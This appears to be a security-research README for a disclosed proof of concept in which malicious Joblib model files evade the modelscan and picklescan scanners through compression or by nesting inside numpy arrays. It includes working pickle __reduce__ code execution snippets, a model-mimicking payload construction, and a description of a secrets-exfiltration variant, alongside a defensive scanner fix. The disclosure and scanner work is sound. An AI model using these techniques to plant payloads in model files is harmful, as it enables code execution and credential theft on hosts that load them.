# Joblib Scanner Bypass PoC: Security Research Artifacts
WARNING: These files are intentionally malicious model files created for authorized security research. DO NOT load them with `joblib.load()` outside of a sandboxed environment. They execute arbitrary code.
## Purpose
These six `.joblib` files demonstrate that existing model file scanners (picklescan, modelscan) fail to detect malicious payloads in Joblib model files. This is a responsible disclosure artifact for the huntr MFV program.
## Scanner Evasion Results (2026-03-20)
| Payload | Evasion Technique | modelscan 0.8.8 | picklescan 1.0.4 | RCE? |
|---|---|---|---|---|
| `payload1_zlib_rce.joblib` | zlib compression | MISSED | 0 globals (false neg) | Yes |
| `payload2_lzma_rce.joblib` | LZMA compression | MISSED | 0 globals (false neg) | Yes |
| `payload3_hidden_in_numpy.joblib` | Nested in numpy array | MISSED | 0 globals (false neg) | Yes |
| `payload4_uncompressed.joblib` | Baseline (no compression) | Detected | Detected | Yes |
| `payload5_exfil_secrets.joblib` | Credential exfiltration | MISSED | 0 globals (false neg) | Yes |
| `payload6_fake_pipeline.joblib` | sklearn Pipeline mimicry | MISSED | 0 globals (false neg) | Yes |
modelscan misses 5 of the 6 payloads; only the uncompressed control is detected. picklescan reports "0 dangerous globals" on every compressed variant, a false negative.
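The "0 globals" false negatives follow directly from scanning raw bytes for pickle opcodes: once the stream is compressed, the opcodes are no longer parseable. A minimal sketch of the effect, using a harmless `os.getcwd` reference in place of the real command-execution payload:

```python
import os
import pickle
import pickletools
import zlib

class Evil:
    def __reduce__(self):
        # Harmless stand-in for the real command-execution payload
        return (os.getcwd, ())

raw = pickle.dumps(Evil())
wrapped = zlib.compress(raw, 9)

def count_globals(data: bytes) -> int:
    """Count import opcodes the way an opcode-level scanner would."""
    try:
        return sum(op.name in ("GLOBAL", "STACK_GLOBAL")
                   for op, _, _ in pickletools.genops(data))
    except ValueError:
        return 0  # stream does not even parse as a pickle

print(count_globals(raw))      # the os.getcwd import is visible
print(count_globals(wrapped))  # 0: compression hides the opcodes
```

On the raw pickle the `os.getcwd` import shows up as a `STACK_GLOBAL` opcode; on the zlib-wrapped bytes the opcode walk fails at position 0 and a scanner that treats that as "nothing dangerous found" reports zero globals.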
## Files
- `payload1_zlib_rce.joblib`: Standard `__reduce__` RCE, zlib compressed. Scanners must decompress to detect it.
- `payload2_lzma_rce.joblib`: Same payload, LZMA compression. Scanners expecting zlib miss this.
- `payload3_hidden_in_numpy.joblib`: RCE object hidden inside a `numpy.ndarray` (`dtype=object`) within a dict that mimics an sklearn model (weights, biases, metadata).
- `payload4_uncompressed.joblib`: No compression. Control sample; scanners should catch this.
- `payload5_exfil_secrets.joblib`: Exfiltrates environment variables matching KEY/SECRET/TOKEN/PASS patterns.
- `payload6_fake_pipeline.joblib`: Payload disguised as an sklearn Pipeline with a `StandardScaler`-like class that has legitimate `mean_`/`scale_` attributes.
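The numpy-nesting trick used by `payload3_hidden_in_numpy.joblib` can be reconstructed roughly as follows. This is a hypothetical sketch: the field names are illustrative, plain `pickle` stands in for `joblib.dump` to keep it dependency-light, and the `eval` string is a harmless stand-in for the real payload.

```python
import pickle

import numpy as np

class Evil:
    def __reduce__(self):
        # Harmless stand-in: the real artifact runs an os command here
        return (eval, ("'executed on load'.upper()",))

# Object-dtype array: numpy pickles each element, so the payload rides along
carrier = np.empty(1, dtype=object)
carrier[0] = Evil()

# Dict shaped like a trained sklearn-style model (names are illustrative)
fake_model = {
    "weights": np.zeros((4, 4)),
    "biases": np.zeros(4),
    "metadata": {"framework": "sklearn", "version": "1.4"},
    "cache": carrier,  # the hidden payload
}

blob = pickle.dumps(fake_model)
```

Deserializing `blob` evaluates the `eval` string as a side effect of reconstructing the object array; a scanner that only inspects the top-level dict structure sees a plausible model.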
## How They Work
All payloads use Python pickle's `__reduce__` protocol to execute code when deserialized:
```python
import joblib

class Evil:
    def __reduce__(self):
        # Runs at deserialization time, before any type checks
        return (eval, ("__import__('os').popen('id').read()",))

joblib.dump(Evil(), "payload.joblib", compress=('zlib', 9))

# Loading this file executes 'id' on the host:
result = joblib.load("payload.joblib")  # "uid=1000(user) ..."
```
The evasion comes from Joblib's compression layer (zlib/LZMA), which turns the pickle opcodes into opaque binary that opcode-level scanners cannot parse, and from nesting payloads inside legitimate-looking numpy arrays.
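A scanner can close this gap by sniffing compression magic bytes and decompressing before walking the opcodes. A minimal sketch, assuming (per joblib's compressor detection) that a zlib-compressed file is a bare zlib stream tagged by its `0x78` header and an LZMA one carries the xz or LZMA-alone magic; real layouts may vary by joblib version:

```python
import lzma
import os
import pickle
import pickletools
import zlib

def _maybe_decompress(data: bytes) -> bytes:
    """Strip the compression wrappers the payloads above rely on."""
    if data[:1] == b"\x78":  # zlib header
        try:
            return zlib.decompress(data)
        except zlib.error:
            pass
    if data[:6] == b"\xfd7zXZ\x00" or data[:1] == b"\x5d":  # xz / LZMA-alone
        try:
            return lzma.decompress(data)
        except lzma.LZMAError:
            pass
    return data

def has_dangerous_globals(data: bytes) -> bool:
    """Statically list imports from pickle opcodes; nothing is executed."""
    data = _maybe_decompress(data)
    try:
        return any(op.name in ("GLOBAL", "STACK_GLOBAL")
                   for op, _, _ in pickletools.genops(data))
    except ValueError:
        return False  # not a recognizable pickle stream

class Evil:
    def __reduce__(self):
        return (os.getcwd, ())  # harmless stand-in for the real payload

payload = pickle.dumps(Evil())
```

With this normalization step, `has_dangerous_globals` flags the payload whether it is raw, zlib-wrapped, or LZMA-wrapped, while a benign pickle with no imports passes.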
## Responsible Disclosure
- Disclosed to: huntr MFV program
- Affected: any system that loads `.joblib` files from untrusted sources
- Scanners affected: modelscan 0.8.8, picklescan 1.0.4
- Researcher: vellaveto
## Do Not Use Maliciously
These artifacts exist solely to improve model file security scanning. Using them against systems without authorization is illegal.